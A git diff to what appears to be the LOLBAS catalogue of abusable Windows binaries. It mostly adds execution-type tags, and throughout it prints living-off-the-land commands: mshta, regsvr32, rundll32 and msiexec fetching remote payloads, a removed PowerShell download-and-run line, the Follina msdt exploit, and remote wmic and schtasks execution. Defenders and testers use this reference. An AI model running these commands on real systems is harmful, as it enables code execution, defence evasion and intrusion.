Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Usecase: Execute code bypass Application whitelisting @@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: MSI - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe" Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Execute code bypass Application allowlisting @@ -31,6 +33,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Application: GUI + - Execute: CMD Full_Path: - Path: C:\Windows\System32\Msdt.exe - Path: C:\Windows\SysWOW64\Msdt.exe diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml index 284430336..d0cc16d41 100644 --- a/yml/OSBinaries/Msedge.yml +++ b/yml/OSBinaries/Msedge.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 8a3de9fe0..eb8167d41 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: WSH + - Execute: HTA + - Execute: Remote - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -20,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream @@ -35,7 +40,7 @@ Commands: MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) Tags: - - Execute: WSH + - Execute: HTA - Command: mshta.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index 35a97e481..7de2d333f 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files @@ -27,6 +32,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files @@ -36,6 +42,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Execute: Remote - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server @@ -43,6 +50,10 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: MST + - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 8a8ee4038..7162943a5 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. Usecase: Proxy execution of remote dll file @@ -20,6 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: DLL + - Execute: Remote - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. Usecase: Execution of CPL files @@ -27,6 +30,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\pcalua.exe Detection: diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index de15d0709..cf36bb628 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: Pcwrun.exe /../../$(calc).exe Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update. Usecase: Proxy execution of binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\pcwrun.exe Detection: diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml index 1da2ab6b8..5c45cce0d 100644 --- a/yml/OSBinaries/Pnputil.yml +++ b/yml/OSBinaries/Pnputil.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1547 OperatingSystem: Windows 7, Windows 10, Windows 11 + Tags: + - Execute: INF Full_Path: - Path: C:\Windows\system32\pnputil.exe Code_Sample: diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 8a1b221d5..0898d43f6 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: XBAP - Command: Presentationhost.exe https://example.com/payload Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml index 0d29e27a3..16d6a1199 100644 --- a/yml/OSBinaries/Provlaunch.yml +++ b/yml/OSBinaries/Provlaunch.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\provlaunch.exe Detection: diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 2272b2631..a5314d116 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -5,15 +5,14 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regasm.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute code and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -22,8 +21,7 @@ Commands: MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 3a65a66f4..b1fde2088 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -5,25 +5,23 @@ Author: 'Oddvar Moe' Created: 2018-05-25 Commands: - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: Execute Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) - Command: regsvcs.exe AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the RegisterClass function. + Description: Loads the target .Net DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting Category: AWL Bypass Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Execute: DLL - - Input: Custom Format + - Execute: DLL (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 27067b81c..979d24dce 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -18,6 +21,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. Usecase: Execute code from remote scriptlet, bypass Application whitelisting @@ -25,6 +30,9 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT + - Execute: Remote - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. Usecase: Execute code from scriptlet, bypass Application whitelisting @@ -32,6 +40,8 @@ Commands: Privileges: User MitreID: T1218.010 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: SCT Full_Path: - Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index ba5d622da..d1941d1eb 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -22,13 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") - Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. - Usecase: Execute code from Internet - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Execute: Remote - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Usecase: Proxy execution @@ -36,13 +30,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. - Usecase: Proxy execution - Category: Execute - Privileges: User - MitreID: T1218.011 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Usecase: Execute code from Internet @@ -50,6 +39,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Usecase: Execute code from alternate data stream @@ -67,7 +58,7 @@ Commands: MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 Tags: - - Execute: DLL + - Execute: COM Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe diff --git a/yml/OSBinaries/Runexehelper.yml b/yml/OSBinaries/Runexehelper.yml index 4437afe30..eafab6008 100644 --- a/yml/OSBinaries/Runexehelper.yml +++ b/yml/OSBinaries/Runexehelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\runexehelper.exe Detection: diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index b3191dcae..40b17aaad 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 95cbcb66b..cd8d44388 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index f8fa24a10..7766c069c 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index f439dc8dd..a938e760b 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1053.005 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index be2a779c7..bd8b11895 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Description: Executes calc.cmd from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures @@ -18,6 +20,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: CMD Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe diff --git a/yml/OSBinaries/Setres.yml b/yml/OSBinaries/Setres.yml index 734aba29b..4e4dd1dad 100644 --- a/yml/OSBinaries/Setres.yml +++ b/yml/OSBinaries/Setres.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\setres.exe Detection: diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index aa20ad96c..975c8316c 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: EXE - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 4c17e6301..7b12cf3ce 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 1809, Windows Server 2019 + Tags: + - Execute: CMD - Command: ssh -o ProxyCommand=calc.exe . Description: Executes calc.exe from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: CMD Full_Path: - Path: c:\windows\system32\OpenSSH\ssh.exe Detection: diff --git a/yml/OSBinaries/Stordiag.yml b/yml/OSBinaries/Stordiag.yml index a2f312ee5..8c62daf9a 100644 --- a/yml/OSBinaries/Stordiag.yml +++ b/yml/OSBinaries/Stordiag.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: EXE - Command: stordiag.exe Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Usecase: Possible defence evasion purposes. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 085a9827d..2ab7e481e 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 + Tags: + - Execute: PowerShell Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 31c79c154..145bd6fca 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 2004 and above, Windows 11 + Tags: + - Execute: EXE - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary @@ -18,6 +20,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1909 and below + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index d2125bd08..7c51f3826 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1127 OperatingSystem: Windows 10 1809 and newer, Windows 11 + Tags: + - Execute: EXE - Command: TTTracer.exe -dumpFull -attach pid Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index d05fd20e6..541818d22 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10 + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 0511e95b3..4ede8878e 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -11,8 +11,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -20,8 +18,6 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Tags: - - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index cf8fa722f..55724dbfb 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.012 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: COM Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6bec321ac..6fa837fe9 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -11,6 +11,8 @@ Commands: Privileges: Administrator MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f5ad51eba..f914071fe 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Administrator - required to enable local manifest setting MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Remote + - Execute: EXE - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 9ceccc762..913ce053d 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe Code_Sample: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 8c1a996e1..5cb953cb8 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE - Command: wmic.exe process call create calc Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: Remote - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 